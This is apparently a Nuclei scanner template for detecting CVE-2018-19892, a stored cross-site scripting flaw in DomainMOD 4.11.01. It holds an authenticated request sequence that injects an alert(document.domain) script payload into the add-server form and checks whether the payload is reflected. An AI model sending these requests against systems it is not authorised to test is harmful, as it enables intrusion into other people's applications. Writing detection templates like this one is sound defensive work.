id: CVE-2018-19892 info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45959 - https://github.com/domainmod/domainmod/issues/85 - https://nvd.nist.gov/vuln/detail/CVE-2018-19892 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-19892 cwe-id: CWE-79 epss-score: 0.00101 epss-percentile: 0.41079 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: domainmod product: domainmod tags: cve2018,cve,domainmod,xss,authenticated,edb http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - | POST /admin/dw/add-server.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= - | GET /admin/dw/servers.php HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 3 matchers-condition: and matchers: - type: word part: body words: - '">' - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a004630440220205a4898e8825d916f205608852de80a194c21629c14d16a97afdc64eff60f0f022060d3f00149d05816014344ecf5c93ec767451fa333ee33a00470500aebcd1a62:922c64590222798bb761d5b6d8e72950